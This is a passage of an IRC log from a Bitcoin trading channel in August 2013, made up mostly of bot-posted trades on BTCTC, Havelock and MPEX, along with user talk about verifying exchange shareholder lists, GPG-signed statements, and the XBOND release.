18:45:56 ActM was highly suspect from this, too Aug 02 18:46:03 [BTCTC] [DMS.MINING] 19 @ 0.01019 = 0.1936 BTC [-] Aug 02 18:46:04 [BTCTC] [DMS.MINING] 20 @ 0.01019 = 0.2038 BTC [-] Aug 02 18:46:06 [BTCTC] [DMS.MINING] 1 @ 0.01 BTC [-] Aug 02 18:46:16 [BTCTC] [LABCOIN] 100 @ 0.00204 = 0.204 BTC [+] Aug 02 18:46:24 [BTCTC] [BTC-BOND] 100 @ 0.009999 = 0.9999 BTC [+] Aug 02 18:46:33 [BTCTC] [BTCGARDEN] 150 @ 0.016 = 2.4 BTC [+] Aug 02 18:46:45 [BTCTC] [LABCOIN] 3 @ 0.00204 = 0.0061 BTC [+] Aug 02 18:46:50 hm :/ this is a big plus on BF side...even though it would be still possible Aug 02 18:46:53 [BTCTC] [LABCOIN] 24 @ 0.00204 = 0.049 BTC [+] Aug 02 18:46:55 [BTCTC] [LABCOIN] 200 @ 0.00204 = 0.408 BTC [+] Aug 02 18:46:56 [BTCTC] [LABCOIN] 166 @ 0.002041 = 0.3388 BTC [+] Aug 02 18:47:23 [BTCTC] [LABCOIN] 3 @ 0.002041 = 0.0061 BTC [+] Aug 02 18:47:26 how exactly does bf handlke it ? Aug 02 18:47:44 [BTCTC] [ACTIVEMINING] 23 @ 0.005501 = 0.1265 BTC [-] Aug 02 18:47:54 mircea_popescu: https://bitfunder.com/assetlist Aug 02 18:48:09 bitcoin adresses are pretty much anonymous. they can register multiple accounts Aug 02 18:48:26 [BTCTC] [LABCOIN] 50 @ 0.002041 = 0.1021 BTC [+] Aug 02 18:48:40 yeah, that's what i meant Aug 02 18:48:42 yes but what does that do ? Aug 02 18:48:43 ActiveMining 2,802 1EMkmqXwDaTK9qNRhgrf24vvMUmkJ7aHGv Aug 02 18:48:47 it would still be possible Aug 02 18:48:50 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 02 18:48:50 that address has 0 txn in it Aug 02 18:48:51 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002986 BTC [+] Aug 02 18:48:53 so what does it prove ? Aug 02 18:49:05 1st one i checked. Aug 02 18:49:15 [BTCTC] [ACTIVEMINING] 25 @ 0.005503 = 0.1376 BTC [+] Aug 02 18:49:28 [BTCTC] [ACTIVEMINING] 50 @ 0.005502 = 0.2751 BTC [-] Aug 02 18:49:28 the adresses are there to prove you're the owner actually - as you can use them to sign messages Aug 02 18:49:28 [BTCTC] [ACTIVEMINING] 1332 @ 0.0055 = 7.326 BTC [-] Aug 02 18:49:29 [BTCTC] [ACTIVEMINING] 1000 @ 0.0055 = 5.5 BTC [-] Aug 02 18:49:40 [BTCTC] [ACTIVEMINING] 25 @ 0.0054 = 0.135 BTC [-] Aug 02 18:49:42 i fail to see what it actually proves tho. Aug 02 18:49:52 that you own them. no more Aug 02 18:49:55 on registering an account you are creating a new address to use as your public address and in the case the exchange goes down, you can claim your shares with this address (signing it) Aug 02 18:50:08 [BTCTC] [DMS.MINING] 1 @ 0.0094 BTC [-] Aug 02 18:50:10 [BTCTC] [BTCGARDEN] 475 @ 0.016 = 7.6 BTC [+] Aug 02 18:50:17 a, that. yes, that's not a bad thing but it has nothing to do with what we were discussing Aug 02 18:50:21 [BTCTC] [LABCOIN] 100 @ 0.002041 = 0.2041 BTC [+] Aug 02 18:50:22 [BTCTC] [COGNITIVE] 2 @ 0.5025 = 1.005 BTC [+] Aug 02 18:50:23 [BTCTC] [COGNITIVE] 1 @ 0.5025 BTC [+] Aug 02 18:50:25 [BTCTC] [COGNITIVE] 1 @ 0.5026 BTC [+] Aug 02 18:50:25 on the scam case not much, just create another one for every account you use your "double-spent" money on Aug 02 18:50:26 [BTCTC] [COGNITIVE] 1 @ 0.503 BTC [+] Aug 02 18:50:26 ie the wash trading Aug 02 18:50:27 [BTCTC] [COGNITIVE] 2 @ 0.506 = 1.012 BTC [+] Aug 02 18:50:27 [BTCTC] [COGNITIVE] 4 @ 0.5101 = 2.0404 BTC [+] Aug 02 18:50:28 [BTCTC] [COGNITIVE] 13 @ 0.511 = 6.643 BTC [+] Aug 02 18:50:31 yea Aug 02 18:50:54 [BTCTC] [DMS.PURCHASE] 1 @ 0.03401 BTC [+] Aug 02 18:51:08 course, suppose i claim my address was in that list. Aug 02 18:51:12 i was just wondering about it if there is something like this on BTCT, since BTCT makes a copy of BF list every 30 mins Aug 02 18:51:15 how could one verify thias claim ? Aug 02 18:51:17 [HAVELOCK] [AM100] 1 @ 0.0371 BTC [-] Aug 02 18:51:56 sign a msg on the blockchain with your username of another exchange and let the issuer of the assets transfer the shares on to another exchange Aug 02 18:52:00 [BTCTC] [COGNITIVE] 20 @ 0.73 = 14.6 BTC [+] Aug 02 18:52:02 [BTCTC] [GSDPT] 6 @ 0.002 = 0.012 BTC [+] Aug 02 18:52:03 [BTCTC] [GSDPT] 61 @ 0.0005021 = 0.0306 BTC [-] Aug 02 18:52:14 what if the list doesn't show my address ? Aug 02 18:52:32 [BTCTC] [COGNITIVE] 6 @ 0.511 = 3.066 BTC [-] Aug 02 18:52:43 [BTCTC] [DMS.PURCHASE] 2 @ 0.03401 = 0.068 BTC [+] Aug 02 18:52:46 something went wrong or the address is from another wallet? Aug 02 18:52:48 [BTCTC] [COGNITIVE] 10 @ 0.71 = 7.1 BTC [+] Aug 02 18:52:58 who knows ? Aug 02 18:53:11 the point being you can't trust the exchange to make a valid list? Aug 02 18:53:18 that's my point. list is kind of useless as you can't distinguish between the case where exchange deleted/replaced a holder's address Aug 02 18:53:21 [BTCTC] [ACTIVEMINING] 4 @ 0.005683 = 0.0227 BTC [+] Aug 02 18:53:24 and the case where someone is claiming fraudulently. Aug 02 18:53:38 thestringpuller there's a reason gpg signatures are good. Aug 02 18:53:41 but, mircea_popescu you give asset issuers a list of gpg keys of assets held no in case of "emergency" Aug 02 18:53:46 [BTCTC] [LABCOIN] 1 @ 0.002039 BTC [-] Aug 02 18:53:51 but you can look it up whenever you want Aug 02 18:53:54 oh gpg keys are more verifiable Aug 02 18:53:57 [BTCTC] [ACTIVEMINING] 25 @ 0.005681 = 0.142 BTC [-] Aug 02 18:53:58 [BTCTC] [ACTIVEMINING] 1698 @ 0.005682 = 9.648 BTC [+] Aug 02 18:53:59 [BTCTC] [ACTIVEMINING] 405 @ 0.005685 = 2.3024 BTC [+] Aug 02 18:53:59 mois "look it up" Aug 02 18:54:00 I SEE Aug 02 18:54:12 thestringpuller the list isn't saved. Aug 02 18:54:21 i could claim it was full of 1asshole599 uyesterday Aug 02 18:54:26 can anyone prove otherwise ? Aug 02 18:54:35 just take a look at the list, see if your address and shares are shown and if not scream "HAX!" Aug 02 18:54:39 the list isn't signed i mean. Aug 02 18:54:46 what does mpex do? Aug 02 18:54:49 yes Aug 02 18:54:49 mois and if someone does scream hax, how do you distinguish ? Aug 02 18:54:52 i was really interested in that post of yours until i got to "my PR chick" Aug 02 18:54:57 mircea_popescu: but your list is signed by mpex's key Aug 02 18:54:59 there is a copy made every 30 minutes on BTCT Aug 02 18:54:59 pankkake mpex issues signed stats to customers. Aug 02 18:55:20 mircea_popescu: so that means if you trust mpex you can trust your list Aug 02 18:55:31 not really. the list being signed, you have proof. Aug 02 18:55:39 which is a better system than this "collective memory" approach. Aug 02 18:55:48 Wild0wnes how's that work ? Aug 02 18:55:49 that's good - I see only one flaw, you could use an older signed issue if it advantages you Aug 02 18:55:59 pankkake not really. because you also make signed orders Aug 02 18:56:13 [BTCTC] [BTCGARDEN] 5500 @ 0.016 = 88 BTC [+] Aug 02 18:56:15 so from any signed stat the string of transactions takes you to the current one. Aug 02 18:56:22 ah yes, and it's easy to backup them Aug 02 18:56:31 I like this system. I think I'm going to "steal" it :) Aug 02 18:56:34 lol Aug 02 18:56:34 MPEX the organization should be the only thing that can access that key right? So if something is signed with that key it's verfiable no? Aug 02 18:56:44 thestringpuller yes. Aug 02 18:57:15 pankkake kinda why i make things, so people with any sense steal them. Aug 02 18:58:01 rather than re-implement solutions to already well solved problems. solutions which are broken but have the dubious merit that well... everyone's an innovator in his own estimation. Aug 02 18:58:25 actually i'm still reading it. just struck me as unlikely that you write a blog but don't do your own PR Aug 02 18:59:03 [BTCTC] [ACTIVEMINING] 25 @ 0.00568 = 0.142 BTC [-] Aug 02 18:59:04 [BTCTC] [ACTIVEMINING] 18 @ 0.005681 = 0.1023 BTC [+] Aug 02 18:59:05 [BTCTC] [ACTIVEMINING] 50 @ 0.005683 = 0.2842 BTC [+] Aug 02 18:59:07 [BTCTC] [ACTIVEMINING] 4 @ 0.005693 = 0.0228 BTC [+] Aug 02 18:59:08 [BTCTC] [ACTIVEMINING] 18 @ 0.005694 = 0.1025 BTC [+] Aug 02 18:59:10 however the part where users have to sign their actions is not very noob-friendly. unless I use something like openpgpjs… Aug 02 18:59:13 does MPEX's key expires annually? Aug 02 18:59:16 but i'm just now kind of checking your blog out so perhaps i'll understand more Aug 02 18:59:18 Wild0wnes why ?! Aug 02 18:59:29 pankkake yes that's a drawback. Aug 02 18:59:39 So 1hr until xbonds, correct? Aug 02 18:59:47 [BTCTC] [BTCGARDEN] 470 @ 0.016 = 7.52 BTC [+] Aug 02 18:59:48 thestringpuller it expires on an irregular schedule. we had an exercise a few months back Aug 02 18:59:49 yup Aug 02 18:59:58 i panicked just now tho Aug 02 19:00:31 [BTCTC] [BTCGARDEN] 70 @ 0.01599 = 1.1193 BTC [-] Aug 02 19:00:55 [BTCTC] [BTCGARDEN] 12500 @ 0.016 = 200 BTC [+] Aug 02 19:01:26 mircea_popescu: http://thegenesisblock.com/wp-content/uploads/2013/08/Network-growth-hedge.png?d855e7 <- this is why I wish there was an X.DIFF bot for MPEX Aug 02 19:01:43 yeah. Aug 02 19:01:43 [BTCTC] [ACTIVEMINING] 25 @ 0.005996 = 0.1499 BTC [+] Aug 02 19:01:44 [BTCTC] [ACTIVEMINING] 11 @ 0.005997 = 0.066 BTC [+] Aug 02 19:01:45 [BTCTC] [ACTIVEMINING] 18 @ 0.006 = 0.108 BTC [+] Aug 02 19:01:47 it's finnicky tho. Aug 02 19:01:57 last idiff mm basically got raped. Aug 02 19:02:02 im not sure i'd trust a bot. Aug 02 19:02:09 you can always hedge your bets on BFL not delivering though Aug 02 19:02:20 1 HOUR til XBOND is released. Aug 02 19:02:24 [BTCTC] [LABCOIN] 82 @ 0.002041 = 0.1674 BTC [+] Aug 02 19:03:13 [BTCTC] [LABCOIN] 1 @ 0.002042 BTC [+] Aug 02 19:03:31 [BTCTC] [BTCGARDEN] 250 @ 0.016 = 4 BTC [+] Aug 02 19:04:11 [BTCTC] [ACTIVEMINING] 25 @ 0.005999 = 0.15 BTC [-] Aug 02 19:04:13 [BTCTC] [ACTIVEMINING] 2 @ 0.006 = 0.012 BTC [+] Aug 02 19:04:16 [BTCTC] [ACTIVEMINING] 10 @ 0.006088 = 0.0609 BTC [+] Aug 02 19:04:18 [BTCTC] [ACTIVEMINING] 40 @ 0.006089 = 0.2436 BTC [+] Aug 02 19:04:22 [BTCTC] [ACTIVEMINING] 27 @ 0.006099 = 0.1647 BTC [+] Aug 02 19:07:06 [BTCTC] [ACTIVEMINING] 1 @ 0.006098 BTC [-] Aug 02 19:07:15 [HAVELOCK] [AM100] 11 @ 0.0371 = 0.4081 BTC [-] Aug 02 19:07:55 [HAVELOCK] [AM100] 10 @ 0.037001 = 0.37 BTC [-] Aug 02 19:08:12 [HAVELOCK] [AM100] 54 @ 0.037 = 1.998 BTC [-] Aug 02 19:09:30 [BTCTC] [RSM] 1 @ 0.01476 BTC [+] Aug 02 19:10:50 [BTCTC] [BTCGARDEN] 124 @ 0.016 = 1.984 BTC [+] Aug 02 19:12:48 [HAVELOCK] [LABCO] 20 @ 0.0022 = 0.044 BTC [+] Aug 02 19:12:55 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 02 19:13:01 [MPEX] [O.USD.P104T] 1000 @ 0.57972693 = 579.7269 BTC [+] Aug 02 19:13:30 [BTCTC] [ACTIVEMINING] 1 @ 0.006093 BTC [-] Aug 02 19:13:40 [HAVELOCK] [LABCO] 2 @ 0.0022 = 0.0044 BTC [+] Aug 02 19:14:25 [BTCTC] [DMS.SELLING] 2 @ 0.021 = 0.042 BTC [-] Aug 02 19:14:31 oh god Aug 02 19:14:49 > ActM_bot Aug 02 19:14:55 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 02 19:15:11 is that a bot that praises "Ken" every five minutes? Aug 02 19:15:17 lol Aug 02 19:15:55 !ticker m ^oix Aug 02 19:15:56 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 65.83416287 / 65.83416287 / (1000 shares, 579.73 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Aug 02 19:15:59 [BTCTC] [LABCOIN] 100 @ 0.002042 = 0.2042 BTC [+] Aug 02 19:16:09 [HAVELOCK] [AM100] 1 @ 0.0388 BTC [+] Aug 02 19:16:16 whoa that's pretty bearish huh Aug 02 19:16:39 [BTCTC] [BTCGARDEN] 610 @ 0.016 = 9.76 BTC [+] Aug 02 19:17:00 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 02 19:17:15 [MPEX] [O.USD.P104T] 1000 @ 0.57972707 = 579.7271 BTC [+] Aug 02 19:17:16 [BTCTC] [LABCOIN] 148 @ 0.002041 = 0.3021 BTC [-] Aug 02 19:17:20 [HAVELOCK] [SDSTM] 2 @ 0.00832 = 0.0166 BTC [+] Aug 02 19:17:27 [MPEX] [O.USD.P107T] 210 @ 0.61577335 = 129.3124 BTC Aug 02 19:17:42 [MPEX] [O.USD.P101T] 730 @ 0.54441616 = 397.4238 BTC [+] Aug 02 19:18:04 dude wtf is going on Aug 02 19:18:11 [BTCTC] [LABCOIN] 210 @ 0.00201 = 0.4221 BTC [-] Aug 02 19:18:13 [BTCTC] [LABCOIN] 52 @ 0.002001 = 0.1041 BTC [-] Aug 02 19:18:14 [BTCTC] [LABCOIN] 100 @ 0.002001 = 0.2001 BTC [-] Aug 02 19:18:15 [BTCTC] [LABCOIN] 576 @ 0.002 = 1.152 BTC [-] Aug 02 19:18:15 !ticker m ^OIX Aug 02 19:18:17 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 65.75329814 / 65.75329814 / (2940 shares, 1,686.19 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Aug 02 19:18:26 [BTCTC] [DMS.MINING] 50 @ 0.01 = 0.5 BTC [+] Aug 02 19:18:38 [BTCTC] [BTCGARDEN] 3000 @ 0.016 = 48 BTC [+] Aug 02 19:18:45 well if past history is any guide, btc is about to pop Aug 02 19:18:57 [BTCTC] [DMS.MINING] 97 @ 0.01095 = 1.0622 BTC [+] Aug 02 19:19:10 [BTCTC] [LABCOIN] 924 @ 0.002 = 1.848 BTC [-] Aug 02 19:19:12 [BTCTC] [DMS.MINING] 20 @ 0.01095 = 0.219 BTC [+] Aug 02 19:19:19 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 02 19:19:20 Good Aug 02 19:19:27 time to buy Aug 02 19:19:28 okay so on xbond.... if on your next IPO how will you keep from double selling stock.... are you going to change the Units Outstanding on the IPO as you get pre-IPO orders? Aug 02 19:19:31 I could use some cheap btc Aug 02 19:19:44 [BTCTC] [BTCGARDEN] 115 @ 0.016 = 1.84 BTC [+] Aug 02 19:20:02 [HAVELOCK] [SMG] 140 @ 0.00024669 = 0.0345 BTC [+] Aug 02 19:20:04 The IPO will have a total, Aug 02 19:20:07 Rulother-pc_ pop not crash Aug 02 19:20:14 and shares sold will be subtracted from it Aug 02 19:20:16 [BTCTC] [LABCOIN] 96 @ 0.00201 = 0.193 BTC [+] Aug 02 19:20:25 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 02 19:20:28 awe Aug 02 19:20:38 I read that as in bubble pop Aug 02 19:21:15 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 19:21:53 ;;ticker Aug 02 19:22:15 [BTCTC] [DMS.MINING] 100 @ 0.01095 = 1.095 BTC [+] Aug 02 19:22:20 $avg Aug 02 19:22:22 mircea_popescu: 101.43 Aug 02 19:22:37 [BTCTC] [BTCGARDEN] 186 @ 0.016 = 2.976 BTC [+] Aug 02 19:22:40 "8. To specify minimum or maximum redemption terms and eligibility for Pre-IPO redemptions" Aug 02 19:22:56 correct Aug 02 19:23:01 [BTCTC] [KENILWORTH] 1 @ 0.001799 BTC [+] Aug 02 19:23:12 is there plans to set a minimum? Aug 02 19:23:25 being that I can't control all people and all things, that right is reserved Aug 02 19:23:35 ;;ticker Aug 02 19:23:39 [BTCTC] [BTCGARDEN] 170 @ 0.016 = 2.72 BTC [+] Aug 02 19:23:43 :< Aug 02 19:23:58 MtGox BTCUSD ticker | Best bid: 105.36001, Best ask: 106.13824, Bid-ask spread: 0.77823, Last trade: 105.35001, 24 hour volume: 27719.02325452, 24 hour low: 101.21111, 24 hour high: 108.00000, 24 hour vwap: 104.93926 Aug 02 19:24:03 [BTCTC] [LABCOIN] 3 @ 0.002009 = 0.006 BTC [-] Aug 02 19:25:16 [BTCTC] [DMS.MINING] 20 @ 0.01095 = 0.219 BTC [+] Aug 02 19:25:40 Wild0wnes, see pm Aug 02 19:26:58 [BTCTC] [LABCOIN] 12 @ 0.002039 = 0.0245 BTC [+] Aug 02 19:27:30 [BTCTC] [DMS.MINING] 5 @ 0.01095 = 0.0548 BTC [+] Aug 02 19:28:59 [BTCTC] [DMS.SELLING] 9 @ 0.025 = 0.225 BTC [+] Aug 02 19:29:38 [BTCTC] [DMS.PURCHASE] 21 @ 0.03394 = 0.7127 BTC [-] Aug 02 19:30:17 [BTCTC] [DMS.PURCHASE] 1 @ 0.03394 BTC [-] Aug 02 19:31:20 [BTCTC] [BTCGARDEN] 238 @ 0.016 = 3.808 BTC [+] Aug 02 19:32:21 [MPEX] [S.MPOE] 5900 @ 0.00082365 = 4.8595 BTC [-] Aug 02 19:32:24 [BTCTC] [BTCGARDEN] 37300 @ 0.016 = 596.8 BTC [+] Aug 02 19:32:43 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 19:33:44 [BTCTC] [BTCGARDEN] 2750 @ 0.016 = 44 BTC [+] Aug 02 19:33:52 [BTCTC] [LABCOIN] 5 @ 0.00204 = 0.0102 BTC [+] Aug 02 19:34:04 [BTCTC] [TAT.ASICMINER] 9 @ 0.0401 = 0.3609 BTC [-] Aug 02 19:34:06 [BTCTC] [TAT.ASICMINER] 50 @ 0.0401 = 2.005 BTC [-] Aug 02 19:34:07 [BTCTC] [TAT.ASICMINER] 12 @ 0.04006 = 0.4807 BTC [-] Aug 02 19:34:08 [BTCTC] [TAT.ASICMINER] 29 @ 0.04005 = 1.1615 BTC [-] Aug 02 19:36:07 [BTCTC] [DMS.MINING] 65 @ 0.0115 = 0.7475 BTC [+] Aug 02 19:36:58 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 02 19:37:32 [BTCTC] [BTCGARDEN] 32750 @ 0.016 = 524 BTC [+] Aug 02 19:38:35 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 02 19:39:46 [BTCTC] [KENILWORTH] 1498 @ 0.001799 = 2.6949 BTC [+] Aug 02 19:40:08 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 02 19:40:23 [BTCTC] [BTCGARDEN] 1250 @ 0.016 = 20 BTC [+] Aug 02 19:40:54 [BTCTC] [LABCOIN] 200 @ 0.001924 = 0.3848 BTC [-] Aug 02 19:40:55 [BTCTC] [LABCOIN] 100 @ 0.001923 = 0.1923 BTC [-] Aug 02 19:40:57 [BTCTC] [LABCOIN] 100 @ 0.001913 = 0.1913 BTC [-] Aug 02 19:40:58 [BTCTC] [LABCOIN] 688 @ 0.001912 = 1.3155 BTC [-] Aug 02 19:40:59 [BTCTC] [LABCOIN] 352 @ 0.001911 = 0.6727 BTC [-] Aug 02 19:41:00 [BTCTC] [LABCOIN] 53 @ 0.001911 = 0.1013 BTC [-] Aug 02 19:41:01 [BTCTC] [LABCOIN] 280 @ 0.001911 = 0.5351 BTC [-] Aug 02 19:41:03 [BTCTC] [LABCOIN] 420 @ 0.001911 = 0.8026 BTC [-] Aug 02 19:41:04 [BTCTC] [LABCOIN] 150 @ 0.00191 = 0.2865 BTC [-] Aug 02 19:41:14 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 02 19:41:43 [BTCTC] [BTCGARDEN] 800 @ 0.016 = 12.8 BTC [+] Aug 02 19:41:52 [BTCTC] [CRYPTO-TRADE] 100 @ 0.1998 = 19.98 BTC [+] Aug 02 19:41:54 [BTCTC] [CRYPTO-TRADE] 53 @ 0.1998 = 10.5894 BTC [+] Aug 02 19:42:05 !ticker m ^OIX Aug 02 19:42:06 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 65.75329814 / 65.75329814 / (2940 shares, 1,686.19 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Aug 02 19:44:20 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00292 = 0.0117 BTC [-] Aug 02 19:44:43 [BTCTC] [BITVPS] 100 @ 0.001689 = 0.1689 BTC [+] Aug 02 19:45:27 wow talk died in here.... Aug 02 19:45:38 [BTCTC] [BTCGARDEN] 888 @ 0.016 = 14.208 BTC [+] Aug 02 19:45:55 [BTCTC] [LABCOIN] 8 @ 0.001901 = 0.0152 BTC [-] Aug 02 19:46:03 [BTCTC] [BTCGARDEN] 565 @ 0.016 = 9.04 BTC [+] Aug 02 19:46:26 [BTCTC] [LABCOIN] 1 @ 0.0019 BTC [-] Aug 02 19:46:27 [BTCTC] [LABCOIN] 200 @ 0.0019 = 0.38 BTC [-] Aug 02 19:46:28 [BTCTC] [LABCOIN] 902 @ 0.0019 = 1.7138 BTC [-] Aug 02 19:46:30 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 02 19:46:35 looks like bitfury has a working prototype Aug 02 19:46:52 http://thegenesisblock.com/bitfury-400-ghs-bitcoin-mining-rig-hits-us-shores/ Aug 02 19:46:54 Bitfury 400 GH/s Bitcoin Mining Rig Hits US Shores - The Genesis Block Aug 02 19:46:59 meaning 100th/s might be viable Aug 02 19:47:12 but mining ewwwww Aug 02 19:47:36 [BTCTC] [LABCOIN] 98 @ 0.0019 = 0.1862 BTC [-] Aug 02 19:47:37 [BTCTC] [LABCOIN] 50 @ 0.00189 = 0.0945 BTC [-] Aug 02 19:47:39 [BTCTC] [LABCOIN] 20 @ 0.00189 = 0.0378 BTC [-] Aug 02 19:47:40 [BTCTC] [LABCOIN] 1000 @ 0.00189 = 1.89 BTC [-] Aug 02 19:47:40 [BTCTC] [LABCOIN] 465 @ 0.001887 = 0.8775 BTC [-] Aug 02 19:47:41 [BTCTC] [LABCOIN] 150 @ 0.001887 = 0.2831 BTC [-] Aug 02 19:47:42 [BTCTC] [LABCOIN] 500 @ 0.001882 = 0.941 BTC [-] Aug 02 19:47:43 [BTCTC] [LABCOIN] 1000 @ 0.00188 = 1.88 BTC [-] Aug 02 19:47:45 [BTCTC] [LABCOIN] 100 @ 0.001851 = 0.1851 BTC [-] Aug 02 19:47:46 [BTCTC] [LABCOIN] 131 @ 0.00185 = 0.2424 BTC [-] Aug 02 19:47:47 [BTCTC] [LABCOIN] 1075 @ 0.00185 = 1.9888 BTC [-] Aug 02 19:47:48 [BTCTC] [LABCOIN] 500 @ 0.00185 = 0.925 BTC [-] Aug 02 19:47:48 jcpham wtf i thought they had a chip hashing 2 months ago Aug 02 19:47:49 [BTCTC] [LABCOIN] 5400 @ 0.00185 = 9.99 BTC [-] Aug 02 19:47:50 [BTCTC] [LABCOIN] 50 @ 0.00182 = 0.091 BTC [-] Aug 02 19:47:51 [BTCTC] [LABCOIN] 135 @ 0.001811 = 0.2445 BTC [-] Aug 02 19:47:51 [BTCTC] [LABCOIN] 5000 @ 0.001811 = 9.055 BTC [-] Aug 02 19:47:52 yes yes dump dump dump and buy back Aug 02 19:47:52 [BTCTC] [LABCOIN] 10000 @ 0.00181 = 18.1 BTC [-] Aug 02 19:47:53 [BTCTC] [LABCOIN] 2300 @ 0.001808 = 4.1584 BTC [-] Aug 02 19:47:54 [BTCTC] [LABCOIN] 1550 @ 0.001806 = 2.7993 BTC [-] Aug 02 19:48:04 [BTCTC] [BTCGARDEN] 4000 @ 0.016 = 64 BTC [+] Aug 02 19:48:08 it's the 400 GH/s "product" Aug 02 19:48:13 although looks incomplete Aug 02 19:48:20 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 02 19:48:22 Rulother_ doesn't seem very likely, buying back Aug 02 19:48:22 no case, no box Aug 02 19:48:27 !t btctc labcoin Aug 02 19:48:29 [BTCT:LABCOIN] 1D: 0.001702 / 0.00205 / 0.002531 (861973 shares, 1768.8 BTC), 7D: 0.001 / 0.00148 / 0.0044 (10036392 shares, 14861.8 BTC), 30D: 0.001 / 0.00148 / 0.0044 (10034041 shares, 14857.3 BTC) Aug 02 19:48:33 just boards on a backplane and a raspi Aug 02 19:48:47 [HAVELOCK] [AM100] 1 @ 0.0379 BTC [-] Aug 02 19:48:57 is the labcoin fiasco coming to close Aug 02 19:49:02 did they get all their money yet Aug 02 19:49:03 perhaps. Aug 02 19:51:26 judging by how butthurt the scammer was sounding in here earlier i doubt they got very much if anything. Aug 02 19:51:37 [BTCTC] [BTCGARDEN] 1438 @ 0.016 = 23.008 BTC [+] Aug 02 19:51:51 [HAVELOCK] [LABCO] 500 @ 0.002 = 1 BTC [-] Aug 02 19:52:04 [BTCTC] [BTCGARDEN] 365 @ 0.016 = 5.84 BTC [+] Aug 02 19:52:15 oh? What happened earlier? Aug 02 19:52:36 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 02 19:52:59 Korbman you'll hafta go through the log. Aug 02 19:53:33 [BTCTC] [BTCGARDEN] 350 @ 0.016 = 5.6 BTC [+] Aug 02 19:54:36 [MPEX] [S.MPOE] 947 @ 0.0008182 = 0.7748 BTC [-] Aug 02 19:54:37 [MPEX] [S.MPOE] 2976 @ 0.00081648 = 2.4298 BTC [-] Aug 02 19:54:39 not sure about that, since I joined this channel not too long ago Aug 02 19:54:44 [MPEX] [S.MPOE] 4082 @ 0.00081532 = 3.3281 BTC [-] Aug 02 19:55:09 [BTCTC] [ASICMINER-PT] 1 @ 4.112 BTC [-] Aug 02 19:55:11 [BTCTC] [ASICMINER-PT] 1 @ 4.111 BTC [-] Aug 02 19:55:14 Swed came in? Aug 02 19:55:45 [BTCTC] [ACTIVEMINING] 13 @ 0.005636 = 0.0733 BTC [-] Aug 02 19:55:59 5 minutes till xbond whos in? Aug 02 19:56:01 [XBOND] [HAVELOCK] Release in 5min! Aug 02 19:56:20 [HAVELOCK] [AM100] 50 @ 0.0369 = 1.845 BTC [-] Aug 02 19:56:23 [HAVELOCK] [AM100] 5 @ 0.03680808 = 0.184 BTC [-] Aug 02 19:56:34 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 02 19:56:51 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 02 19:57:06 [HAVELOCK] [AM100] 3 @ 0.03680808 = 0.1104 BTC [-] Aug 02 19:57:13 [HAVELOCK] [AM100] 4 @ 0.03680808 = 0.1472 BTC [-] Aug 02 19:57:39 [HAVELOCK] [AM100] 9 @ 0.03680808 = 0.3313 BTC [-] Aug 02 19:57:52 [BTCTC] [BTCGARDEN] 555 @ 0.016 = 8.88 BTC [+] Aug 02 19:58:02 [HAVELOCK] [AM100] 79 @ 0.03680808 = 2.9078 BTC [-] Aug 02 19:58:22 [BTCTC] [LABCOIN] 1000 @ 0.001805 = 1.805 BTC [-] Aug 02 19:58:31 http://tinyurl.com/TATcoins Aug 02 19:58:37 Havelock Investments Aug 02 19:58:42 [BTCTC] [LABCOIN] 400 @ 0.001805 = 0.722 BTC [-] Aug 02 19:59:13 I guess they pretty much are tatcoins Aug 02 19:59:27 Korbman you go /topic Aug 02 19:59:36 [BTCTC] [LABCOIN] 77 @ 0.001806 = 0.1391 BTC [+] Aug 02 19:59:39 I'd rather have titcoins Aug 02 19:59:49 +1 Aug 02 20:00:09 titcoins vs boobcoins mudfight Aug 02 20:00:14 [HAVELOCK] [XBOND] 100 @ 0.001 = 0.1 BTC Aug 02 20:00:17 [HAVELOCK] [XBOND] 4000 @ 0.001 = 4 BTC Aug 02 20:00:20 [HAVELOCK] [XBOND] 5000 @ 0.001 = 5 BTC Aug 02 20:00:22 fuck Aug 02 20:00:23 [HAVELOCK] [XBOND] 499 @ 0.001 = 0.499 BTC Aug 02 20:00:25 [HAVELOCK] [XBOND] 50 @ 0.001 = 0.05 BTC Aug 02 20:00:27 [HAVELOCK] [XBOND] 200 @ 0.001 = 0.2 BTC Aug 02 20:00:28 [HAVELOCK] [XBOND] 24000 @ 0.001 = 24 BTC Aug 02 20:00:30 [HAVELOCK] [XBOND] 10000 @ 0.001 = 10 BTC Aug 02 20:00:33 [HAVELOCK] [XBOND] 50 @ 0.001 = 0.05 BTC Aug 02 20:00:34 So many xbonds about to come across this screen Aug 02 20:00:34 locked out Aug 02 20:00:36 [HAVELOCK] [XBOND] 20000 @ 0.001 = 20 BTC Aug 02 20:00:39 [HAVELOCK] [XBOND] 60 @ 0.001 = 0.06 BTC Aug 02 20:00:41 [HAVELOCK] [XBOND] 50000 @ 